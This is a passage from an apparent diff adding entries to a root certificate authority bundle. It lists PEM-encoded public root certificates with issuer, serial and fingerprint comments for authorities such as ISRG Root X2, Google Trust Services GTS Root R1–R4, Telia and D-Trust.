+flqUhSZNO7rrTOiwCcJlwp2dCZtOtZcFrPUGoPc2BX70kLJrxLT5ZOrpGgrIDajt +J8nU57O5q4IikCc9Kuh8kO+8T/3iCiSn3mUkpF3qwHYw03dQ+A0Em5Q2AXPKBlim +0zvc+gRGE1WKyURHuFE5Gi7oNOJ5y1lKCn+8pu8fA2dqWSslYpPZUxlmPCdiKYZN +pGvu/9ROutW04o5IWgAZCfEF2c6Rsffr6TlP9m8EQ5pV9T4FFL2/s1m02I4zhKOQ +UqqzApVg+QxMaPnu1RcN+HFXtSXkKe5lXa/R7jwXC1pDxaWG6iSe4gUH3DRCEpHW +OXSuTEGC2/KmSNGzm/MzqvOmwMVO9fSddmPmAsYiS8GVP1BkLFTltvA8Kc9XAgMB +AAGjQjBAMB0GA1UdDgQWBBRUYnBj8XWEQ1iO0RYgscasGrz2iTAPBgNVHRMBAf8E +BTADAQH/MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAKbqSSaet +8PFww+SX8J+pJdVrnjT+5hpk9jprUrIQeBqfTNqK2uwcN1LgQkv7bHbKJAs5EhWd +nxEt/Hlk3ODg9d3gV8mlsnZwUKT+twpw1aA08XXXTUm6EdGz2OyC/+sOxL9kLX1j +bhd47F18iMjrjld22VkE+rxSH0Ws8HqA7Oxvdq6R2xCOBNyS36D25q5J08FsEhvM +Kar5CKXiNxTKsbhm7xqC5PD48acWabfbqWE8n/Uxy+QARsIvdLGx14HuqCaVvIiv +TDUHKgLKeBRtRytAVunLKmChZwOgzoy8sHJnxDHO2zTlJQNgJXtxmOTAGytfdELS +S8VZCAeHvsXDf+eW2eHcKJfWjwXj9ZtOyh1QRwVTsMo554WgicEFOwE30z9J4nfr +I8iIZjs9OXYhRvHsXyO466JmdXTBQPfYaJqT4i2pLr0cox7IdMakLXogqzu4sEb9 +b91fUlV1YvCXoHzXOP0l382gmxDPi7g4Xl7FtKYCNqEeXxzP4padKar9mK5S4fNB +UvupLnKWnyfjqnN9+BojZns7q2WwMgFLFT49ok8MKzWixtlnEjUwzXYuFrOZnk1P +Ti07NEPhmg4NpGaXutIcSkwsKouLgU9xGqndXHt7CMUADTdA43x7VF8vhV929ven +sBxXVsFy6K2ir40zSbofitzmdHxghm+Hl3s= +-----END CERTIFICATE----- + +# Issuer: CN=ISRG Root X2 O=Internet Security Research Group +# Subject: CN=ISRG Root X2 O=Internet Security Research Group +# Label: "ISRG Root X2" +# Serial: 87493402998870891108772069816698636114 +# MD5 Fingerprint: d3:9e:c4:1e:23:3c:a6:df:cf:a3:7e:6d:e0:14:e6:e5 +# SHA1 Fingerprint: bd:b1:b9:3c:d5:97:8d:45:c6:26:14:55:f8:db:95:c7:5a:d1:53:af +# SHA256 Fingerprint: 69:72:9b:8e:15:a8:6e:fc:17:7a:57:af:b7:17:1d:fc:64:ad:d2:8c:2f:ca:8c:f1:50:7e:34:45:3c:cb:14:70 +-----BEGIN CERTIFICATE----- +MIICGzCCAaGgAwIBAgIQQdKd0XLq7qeAwSxs6S+HUjAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yMDA5MDQwMDAwMDBaFw00 +MDA5MTcxNjAwMDBaME8xCzAJBgNVBAYTAlVTMSkwJwYDVQQKEyBJbnRlcm5ldCBT +ZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMMSVNSRyBSb290IFgyMHYw +EAYHKoZIzj0CAQYFK4EEACIDYgAEzZvVn4CDCuwJSvMWSj5cz3es3mcFDR0HttwW ++1qLFNvicWDEukWVEYmO6gbf9yoWHKS5xcUy4APgHoIYOIvXRdgKam7mAHf7AlF9 +ItgKbppbd9/w+kHsOdx1ymgHDB/qo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0T +AQH/BAUwAwEB/zAdBgNVHQ4EFgQUfEKWrt5LSDv6kviejM9ti6lyN5UwCgYIKoZI +zj0EAwMDaAAwZQIwe3lORlCEwkSHRhtFcP9Ymd70/aTSVaYgLXTWNLxBo1BfASdW +tL4ndQavEi51mI38AjEAi/V3bNTIZargCyzuFJ0nN6T5U6VR5CmD1/iQMVtCnwr1 +/q4AaOeMSQ+2b1tbFfLn +-----END CERTIFICATE----- + +# Issuer: CN=HiPKI Root CA - G1 O=Chunghwa Telecom Co., Ltd. +# Subject: CN=HiPKI Root CA - G1 O=Chunghwa Telecom Co., Ltd. +# Label: "HiPKI Root CA - G1" +# Serial: 60966262342023497858655262305426234976 +# MD5 Fingerprint: 69:45:df:16:65:4b:e8:68:9a:8f:76:5f:ff:80:9e:d3 +# SHA1 Fingerprint: 6a:92:e4:a8:ee:1b:ec:96:45:37:e3:29:57:49:cd:96:e3:e5:d2:60 +# SHA256 Fingerprint: f0:15:ce:3c:c2:39:bf:ef:06:4b:e9:f1:d2:c4:17:e1:a0:26:4a:0a:94:be:1f:0c:8d:12:18:64:eb:69:49:cc +-----BEGIN CERTIFICATE----- +MIIFajCCA1KgAwIBAgIQLd2szmKXlKFD6LDNdmpeYDANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xGzAZBgNVBAMMEkhpUEtJIFJvb3QgQ0EgLSBHMTAeFw0xOTAyMjIwOTQ2MDRa +Fw0zNzEyMzExNTU5NTlaME8xCzAJBgNVBAYTAlRXMSMwIQYDVQQKDBpDaHVuZ2h3 +YSBUZWxlY29tIENvLiwgTHRkLjEbMBkGA1UEAwwSSGlQS0kgUm9vdCBDQSAtIEcx +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9B5/UnMyDHPkvRN0o9Qw +qNCuS9i233VHZvR85zkEHmpwINJaR3JnVfSl6J3VHiGh8Ge6zCFovkRTv4354twv +Vcg3Px+kwJyz5HdcoEb+d/oaoDjq7Zpy3iu9lFc6uux55199QmQ5eiY29yTw1S+6 +lZgRZq2XNdZ1AYDgr/SEYYwNHl98h5ZeQa/rh+r4XfEuiAU+TCK72h8q3VJGZDnz +Qs7ZngyzsHeXZJzA9KMuH5UHsBffMNsAGJZMoYFL3QRtU6M9/Aes1MU3guvklQgZ +KILSQjqj2FPseYlgSGDIcpJQ3AOPgz+yQlda22rpEZfdhSi8MEyr48KxRURHH+CK +FgeW0iEPU8DtqX7UTuybCeyvQqww1r/REEXgphaypcXTT3OUM3ECoWqj1jOXTyFj +HluP2cFeRXF3D4FdXyGarYPM+l7WjSNfGz1BryB1ZlpK9p/7qxj3ccC2HTHsOyDr +y+K49a6SsvfhhEvyovKTmiKe0xRvNlS9H15ZFblzqMF8b3ti6RZsR1pl8w4Rm0bZ +/W3c1pzAtH2lsN0/Vm+h+fbkEkj9Bn8SV7apI09bA8PgcSojt/ewsTu8mL3WmKgM +a/aOEmem8rJY5AIJEzypuxC00jBF8ez3ABHfZfjcK0NVvxaXxA/VLGGEqnKG/uY6 +fsI/fe78LxQ+5oXdUG+3Se0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQU8ncX+l6o/vY9cdVouslGDDjYr7AwDgYDVR0PAQH/BAQDAgGGMA0GCSqG +SIb3DQEBCwUAA4ICAQBQUfB13HAE4/+qddRxosuej6ip0691x1TPOhwEmSKsxBHi +7zNKpiMdDg1H2DfHb680f0+BazVP6XKlMeJ45/dOlBhbQH3PayFUhuaVevvGyuqc +SE5XCV0vrPSltJczWNWseanMX/mF+lLFjfiRFOs6DRfQUsJ748JzjkZ4Bjgs6Fza +ZsT0pPBWGTMpWmWSBUdGSquEwx4noR8RkpkndZMPvDY7l1ePJlsMu5wP1G4wB9Tc +XzZoZjmDlicmisjEOf6aIW/Vcobpf2Lll07QJNBAsNB1CI69aO4I1258EHBGG3zg +iLKecoaZAeO/n0kZtCW+VmWuF2PlHt/o/0elv+EmBYTksMCv5wiZqAxeJoBF1Pho +L5aPruJKHJwWDBNvOIf2u8g0X5IDUXlwpt/L9ZlNec1OvFefQ05rLisY+GpzjLrF +Ne85akEez3GoorKGB1s6yeHvP2UEgEcyRHCVTjFnanRbEEV16rCf0OY1/k6fi8wr +kkVbbiVghUbN0aqwdmaTd5a+g744tiROJgvM7XpWGuDpWsZkrUx6AEhEL7lAuxM+ +vhV4nYWBSipX3tUZQ9rbyltHhoMLP7YNdnhzeSJesYAfz77RP1YQmCuVh6EfnWQU +YDksswBVLuT1sw5XxJFBAJw/6KXf6vb/yPCtbVKoF6ubYfwSUTXkJf2vqmqGOQ== +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R4 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R4 +# Label: "GlobalSign ECC Root CA - R4" +# Serial: 159662223612894884239637590694 +# MD5 Fingerprint: 26:29:f8:6d:e1:88:bf:a2:65:7f:aa:c4:cd:0f:7f:fc +# SHA1 Fingerprint: 6b:a0:b0:98:e1:71:ef:5a:ad:fe:48:15:80:77:10:f4:bd:6f:0b:28 +# SHA256 Fingerprint: b0:85:d7:0b:96:4f:19:1a:73:e4:af:0d:54:ae:7a:0e:07:aa:fd:af:9b:71:dd:08:62:13:8a:b7:32:5a:24:a2 +-----BEGIN CERTIFICATE----- +MIIB3DCCAYOgAwIBAgINAgPlfvU/k/2lCSGypjAKBggqhkjOPQQDAjBQMSQwIgYD +VQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0gUjQxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTIxMTEzMDAwMDAwWhcNMzgw +MTE5MDMxNDA3WjBQMSQwIgYDVQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0g +UjQxEzARBgNVBAoTCkdsb2JhbFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wWTAT +BgcqhkjOPQIBBggqhkjOPQMBBwNCAAS4xnnTj2wlDp8uORkcA6SumuU5BwkWymOx +uYb4ilfBV85C+nOh92VC/x7BALJucw7/xyHlGKSq2XE/qNS5zowdo0IwQDAOBgNV +HQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUVLB7rUW44kB/ ++wpu+74zyTyjhNUwCgYIKoZIzj0EAwIDRwAwRAIgIk90crlgr/HmnKAWBVBfw147 +bmF0774BxL4YSFlhgjICICadVGNA3jdgUM/I2O2dgq43mLyjj0xMqTQrbO/7lZsm +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R1 O=Google Trust Services LLC +# Subject: CN=GTS Root R1 O=Google Trust Services LLC +# Label: "GTS Root R1" +# Serial: 159662320309726417404178440727 +# MD5 Fingerprint: 05:fe:d0:bf:71:a8:a3:76:63:da:01:e0:d8:52:dc:40 +# SHA1 Fingerprint: e5:8c:1c:c4:91:3b:38:63:4b:e9:10:6e:e3:ad:8e:6b:9d:d9:81:4a +# SHA256 Fingerprint: d9:47:43:2a:bd:e7:b7:fa:90:fc:2e:6b:59:10:1b:12:80:e0:e1:c7:e4:e4:0f:a3:c6:88:7f:ff:57:a7:f4:cf +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlk28xsBNJiGuiFzANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjEwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjEwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQC2EQKLHuOhd5s73L+UPreVp0A8of2C+X0yBoJx9vaMf/vo +27xqLpeXo4xL+Sv2sfnOhB2x+cWX3u+58qPpvBKJXqeqUqv4IyfLpLGcY9vXmX7w +Cl7raKb0xlpHDU0QM+NOsROjyBhsS+z8CZDfnWQpJSMHobTSPS5g4M/SCYe7zUjw +TcLCeoiKu7rPWRnWr4+wB7CeMfGCwcDfLqZtbBkOtdh+JhpFAz2weaSUKK0Pfybl +qAj+lug8aJRT7oM6iCsVlgmy4HqMLnXWnOunVmSPlk9orj2XwoSPwLxAwAtcvfaH +szVsrBhQf4TgTM2S0yDpM7xSma8ytSmzJSq0SPly4cpk9+aCEI3oncKKiPo4Zor8 +Y/kB+Xj9e1x3+naH+uzfsQ55lVe0vSbv1gHR6xYKu44LtcXFilWr06zqkUspzBmk +MiVOKvFlRNACzqrOSbTqn3yDsEB750Orp2yjj32JgfpMpf/VjsPOS+C12LOORc92 +wO1AK/1TD7Cn1TsNsYqiA94xrcx36m97PtbfkSIS5r762DL8EGMUUXLeXdYWk70p +aDPvOmbsB4om3xPXV2V4J95eSRQAogB/mqghtqmxlbCluQ0WEdrHbEg8QOB+DVrN +VjzRlwW5y0vtOUucxD/SVRNuJLDWcfr0wbrM7Rv1/oFB2ACYPTrIrnqYNxgFlQID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQU5K8rJnEaK0gnhS9SZizv8IkTcT4wDQYJKoZIhvcNAQEMBQADggIBAJ+qQibb +C5u+/x6Wki4+omVKapi6Ist9wTrYggoGxval3sBOh2Z5ofmmWJyq+bXmYOfg6LEe +QkEzCzc9zolwFcq1JKjPa7XSQCGYzyI0zzvFIoTgxQ6KfF2I5DUkzps+GlQebtuy +h6f88/qBVRRiClmpIgUxPoLW7ttXNLwzldMXG+gnoot7TiYaelpkttGsN/H9oPM4 +7HLwEXWdyzRSjeZ2axfG34arJ45JK3VmgRAhpuo+9K4l/3wV3s6MJT/KYnAK9y8J +ZgfIPxz88NtFMN9iiMG1D53Dn0reWVlHxYciNuaCp+0KueIHoI17eko8cdLiA6Ef +MgfdG+RCzgwARWGAtQsgWSl4vflVy2PFPEz0tv/bal8xa5meLMFrUKTX5hgUvYU/ +Z6tGn6D/Qqc6f1zLXbBwHSs09dR2CQzreExZBfMzQsNhFRAbd03OIozUhfJFfbdT +6u9AWpQKXCBfTkBdYiJ23//OYb2MI3jSNwLgjt7RETeJ9r/tSQdirpLsQBqvFAnZ +0E6yove+7u7Y/9waLd64NnHi/Hm3lCXRSHNboTXns5lndcEZOitHTtNCjv0xyBZm +2tIMPNuzjsmhDYAPexZ3FL//2wmUspO8IFgV6dtxQ/PeEMMA3KgqlbbC1j+Qa3bb +bP6MvPJwNQzcmRk13NfIRmPVNnGuV/u3gm3c +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R2 O=Google Trust Services LLC +# Subject: CN=GTS Root R2 O=Google Trust Services LLC +# Label: "GTS Root R2" +# Serial: 159662449406622349769042896298 +# MD5 Fingerprint: 1e:39:c0:53:e6:1e:29:82:0b:ca:52:55:36:5d:57:dc +# SHA1 Fingerprint: 9a:44:49:76:32:db:de:fa:d0:bc:fb:5a:7b:17:bd:9e:56:09:24:94 +# SHA256 Fingerprint: 8d:25:cd:97:22:9d:bf:70:35:6b:da:4e:b3:cc:73:40:31:e2:4c:f0:0f:af:cf:d3:2d:c7:6e:b5:84:1c:7e:a8 +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlrsWNBCUaqxElqjANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjIwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjIwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQDO3v2m++zsFDQ8BwZabFn3GTXd98GdVarTzTukk3LvCvpt +nfbwhYBboUhSnznFt+4orO/LdmgUud+tAWyZH8QiHZ/+cnfgLFuv5AS/T3KgGjSY +6Dlo7JUle3ah5mm5hRm9iYz+re026nO8/4Piy33B0s5Ks40FnotJk9/BW9BuXvAu +MC6C/Pq8tBcKSOWIm8Wba96wyrQD8Nr0kLhlZPdcTK3ofmZemde4wj7I0BOdre7k +RXuJVfeKH2JShBKzwkCX44ofR5GmdFrS+LFjKBC4swm4VndAoiaYecb+3yXuPuWg +f9RhD1FLPD+M2uFwdNjCaKH5wQzpoeJ/u1U8dgbuak7MkogwTZq9TwtImoS1mKPV ++3PBV2HdKFZ1E66HjucMUQkQdYhMvI35ezzUIkgfKtzra7tEscszcTJGr61K8Yzo +dDqs5xoic4DSMPclQsciOzsSrZYuxsN2B6ogtzVJV+mSSeh2FnIxZyuWfoqjx5RW +Ir9qS34BIbIjMt/kmkRtWVtd9QCgHJvGeJeNkP+byKq0rxFROV7Z+2et1VsRnTKa +G73VululycslaVNVJ1zgyjbLiGH7HrfQy+4W+9OmTN6SpdTi3/UGVN4unUu0kzCq +gc7dGtxRcw1PcOnlthYhGXmy5okLdWTK1au8CcEYof/UVKGFPP0UJAOyh9OktwID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQUu//KjiOfT5nK2+JopqUVJxce2Q4wDQYJKoZIhvcNAQEMBQADggIBAB/Kzt3H +vqGf2SdMC9wXmBFqiN495nFWcrKeGk6c1SuYJF2ba3uwM4IJvd8lRuqYnrYb/oM8 +0mJhwQTtzuDFycgTE1XnqGOtjHsB/ncw4c5omwX4Eu55MaBBRTUoCnGkJE+M3DyC +B19m3H0Q/gxhswWV7uGugQ+o+MePTagjAiZrHYNSVc61LwDKgEDg4XSsYPWHgJ2u +NmSRXbBoGOqKYcl3qJfEycel/FVL8/B/uWU9J2jQzGv6U53hkRrJXRqWbTKH7QMg +yALOWr7Z6v2yTcQvG99fevX4i8buMTolUVVnjWQye+mew4K6Ki3pHrTgSAai/Gev +HyICc/sgCq+dVEuhzf9gR7A/Xe8bVr2XIZYtCtFenTgCR2y59PYjJbigapordwj6 +xLEokCZYCDzifqrXPW+6MYgKBesntaFJ7qBFVHvmJ2WZICGoo7z7GJa7Um8M7YNR +TOlZ4iBgxcJlkoKM8xAfDoqXvneCbT+PHV28SSe9zE8P4c52hgQjxcCMElv924Sg +JPFI/2R80L5cFtHvma3AH/vLrrw4IgYmZNralw4/KBVEqE8AyvCazM90arQ+POuV +7LXTWtiBmelDGDfrs7vRWGJB82bSj6p4lVQgw1oudCvV0b4YacCs1aTPObpRhANl +6WLAYv7YTVWW4tAR+kg0Eeye7QUd5MjWHYbL +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R3 O=Google Trust Services LLC +# Subject: CN=GTS Root R3 O=Google Trust Services LLC +# Label: "GTS Root R3" +# Serial: 159662495401136852707857743206 +# MD5 Fingerprint: 3e:e7:9d:58:02:94:46:51:94:e5:e0:22:4a:8b:e7:73 +# SHA1 Fingerprint: ed:e5:71:80:2b:c8:92:b9:5b:83:3c:d2:32:68:3f:09:cd:a0:1e:46 +# SHA256 Fingerprint: 34:d8:a7:3e:e2:08:d9:bc:db:0d:95:65:20:93:4b:4e:40:e6:94:82:59:6e:8b:6f:73:c8:42:6b:01:0a:6f:48 +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPluILrIPglJ209ZjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjMwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjMwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AAQfTzOHMymKoYTey8chWEGJ6ladK0uFxh1MJ7x/JlFyb+Kf1qPKzEUURout736G +jOyxfi//qXGdGIRFBEFVbivqJn+7kAHjSxm65FSWRQmx1WyRRK2EE46ajA2ADDL2 +4CejQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBTB8Sa6oC2uhYHP0/EqEr24Cmf9vDAKBggqhkjOPQQDAwNpADBmAjEA9uEglRR7 +VKOQFhG/hMjqb2sXnh5GmCCbn9MN2azTL818+FsuVbu/3ZL3pAzcMeGiAjEA/Jdm +ZuVDFhOD3cffL74UOO0BzrEXGhF16b0DjyZ+hOXJYKaV11RZt+cRLInUue4X +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R4 O=Google Trust Services LLC +# Subject: CN=GTS Root R4 O=Google Trust Services LLC +# Label: "GTS Root R4" +# Serial: 159662532700760215368942768210 +# MD5 Fingerprint: 43:96:83:77:19:4d:76:b3:9d:65:52:e4:1d:22:a5:e8 +# SHA1 Fingerprint: 77:d3:03:67:b5:e0:0c:15:f6:0c:38:61:df:7c:e1:3b:92:46:4d:47 +# SHA256 Fingerprint: 34:9d:fa:40:58:c5:e2:63:12:3b:39:8a:e7:95:57:3c:4e:13:13:c8:3f:e6:8f:93:55:6c:d5:e8:03:1b:3c:7d +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPlwGjvYxqccpBQUjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjQwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjQwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AATzdHOnaItgrkO4NcWBMHtLSZ37wWHO5t5GvWvVYRg1rkDdc/eJkTBa6zzuhXyi +QHY7qca4R9gq55KRanPpsXI5nymfopjTX15YhmUPoYRlBtHci8nHc8iMai/lxKvR +HYqjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBSATNbrdP9JNqPV2Py1PsVq8JQdjDAKBggqhkjOPQQDAwNpADBmAjEA6ED/g94D +9J+uHXqnLrmvT/aDHQ4thQEd0dlq7A/Cr8deVl5c1RxYIigL9zC2L7F8AjEA8GE8 +p/SgguMh1YQdc4acLa/KNJvxn7kjNuK8YAOdgLOaVsjh4rsUecrNIdSUtUlD +-----END CERTIFICATE----- + +# Issuer: CN=Telia Root CA v2 O=Telia Finland Oyj +# Subject: CN=Telia Root CA v2 O=Telia Finland Oyj +# Label: "Telia Root CA v2" +# Serial: 7288924052977061235122729490515358 +# MD5 Fingerprint: 0e:8f:ac:aa:82:df:85:b1:f4:dc:10:1c:fc:99:d9:48 +# SHA1 Fingerprint: b9:99:cd:d1:73:50:8a:c4:47:05:08:9c:8c:88:fb:be:a0:2b:40:cd +# SHA256 Fingerprint: 24:2b:69:74:2f:cb:1e:5b:2a:bf:98:89:8b:94:57:21:87:54:4e:5b:4d:99:11:78:65:73:62:1f:6a:74:b8:2c +-----BEGIN CERTIFICATE----- +MIIFdDCCA1ygAwIBAgIPAWdfJ9b+euPkrL4JWwWeMA0GCSqGSIb3DQEBCwUAMEQx +CzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZMBcGA1UE +AwwQVGVsaWEgUm9vdCBDQSB2MjAeFw0xODExMjkxMTU1NTRaFw00MzExMjkxMTU1 +NTRaMEQxCzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZ +MBcGA1UEAwwQVGVsaWEgUm9vdCBDQSB2MjCCAiIwDQYJKoZIhvcNAQEBBQADggIP +ADCCAgoCggIBALLQPwe84nvQa5n44ndp586dpAO8gm2h/oFlH0wnrI4AuhZ76zBq +AMCzdGh+sq/H1WKzej9Qyow2RCRj0jbpDIX2Q3bVTKFgcmfiKDOlyzG4OiIjNLh9 +vVYiQJ3q9HsDrWj8soFPmNB06o3lfc1jw6P23pLCWBnglrvFxKk9pXSW/q/5iaq9 +lRdU2HhE8Qx3FZLgmEKnpNaqIJLNwaCzlrI6hEKNfdWV5Nbb6WLEWLN5xYzTNTOD +n3WhUidhOPFZPY5Q4L15POdslv5e2QJltI5c0BE0312/UqeBAMN/mUWZFdUXyApT +7GPzmX3MaRKGwhfwAZ6/hLzRUssbkmbOpFPlob/E2wnW5olWK8jjfN7j/4nlNW4o +6GwLI1GpJQXrSPjdscr6bAhR77cYbETKJuFzxokGgeWKrLDiKca5JLNrRBH0pUPC +TEPlcDaMtjNXepUugqD0XBCzYYP2AgWGLnwtbNwDRm41k9V6lS/eINhbfpSQBGq6 +WT0EBXWdN6IOLj3rwaRSg/7Qa9RmjtzG6RJOHSpXqhC8fF6CfaamyfItufUXJ63R +DolUK5X6wK0dmBR4M0KGCqlztft0DbcbMBnEWg4cJ7faGND/isgFuvGqHKI3t+ZI +pEYslOqodmJHixBTB0hXbOKSTbauBcvcwUpej6w9GU7C7WB1K9vBykLVAgMBAAGj +YzBhMB8GA1UdIwQYMBaAFHKs5DN5qkWH9v2sHZ7Wxy+G2CQ5MB0GA1UdDgQWBBRy +rOQzeapFh/b9rB2e1scvhtgkOTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUw +AwEB/zANBgkqhkiG9w0BAQsFAAOCAgEAoDtZpwmUPjaE0n4vOaWWl/oRrfxn83EJ +8rKJhGdEr7nv7ZbsnGTbMjBvZ5qsfl+yqwE2foH65IRe0qw24GtixX1LDoJt0nZi +0f6X+J8wfBj5tFJ3gh1229MdqfDBmgC9bXXYfef6xzijnHDoRnkDry5023X4blMM +A8iZGok1GTzTyVR8qPAs5m4HeW9q4ebqkYJpCh3DflminmtGFZhb069GHWLIzoBS +SRE/yQQSwxN8PzuKlts8oB4KtItUsiRnDe+Cy748fdHif64W1lZYudogsYMVoe+K +TTJvQS8TUoKU1xrBeKJR3Stwbbca+few4GeXVtt8YVMJAygCQMez2P2ccGrGKMOF +6eLtGpOg3kuYooQ+BXcBlj37tCAPnHICehIv1aO6UXivKitEZU61/Qrowc15h2Er +3oBXRb9n8ZuRXqWk7FlIEA04x7D6w0RtBPV4UBySllva9bguulvP5fBqnUsvWHMt +Ty3EHD70sz+rFQ47GUGKpMFXEmZxTPpT41frYpUJnlTd0cI8Vzy9OK2YZLe4A5pT +VmBds9hCG1xLEooc6+t9xnppxyd/pPiL8uSUZodL6ZQHCRJ5irLrdATczvREWeAW +ysUsWNc8e89ihmpQfTU2Zqf7N+cox9jQraVplI/owd8k+BsHMYeB2F326CjYSlKA +rBPuUBQemMc= +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST BR Root CA 1 2020 O=D-Trust GmbH +# Subject: CN=D-TRUST BR Root CA 1 2020 O=D-Trust GmbH +# Label: "D-TRUST BR Root CA 1 2020" +# Serial: 165870826978392376648679885835942448534 +# MD5 Fingerprint: b5:aa:4b:d5:ed:f7:e3:55:2e:8f:72:0a:f3:75:b8:ed +# SHA1 Fingerprint: 1f:5b:98:f0:e3:b5:f7:74:3c:ed:e6:b0:36:7d:32:cd:f4:09:41:67 +# SHA256 Fingerprint: e5:9a:aa:81:60:09:c2:2b:ff:5b:25:ba:d3:7d:f3:06:f0:49:79:7c:1f:81:d8:5a:b0:89:e6:57:bd:8f:00:44 +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQfMmPK4TX3+oPyWWa00tNljAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEJSIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTA5NDUwMFoXDTM1MDIxMTA5 +NDQ1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBCUiBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABMbLxyjR+4T1mu9CFCDhQ2tuda38KwOE1HaTJddZO0Flax7mNCq7dPYS +zuht56vkPE4/RAiLzRZxy7+SmfSk1zxQVFKQhYN4lGdnoxwJGT11NIXe7WB9xwy0 +QVK5buXuQqOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFHOREKv/ +VbNafAkl1bK6CKBrqx9tMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2JyX3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwQlIlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 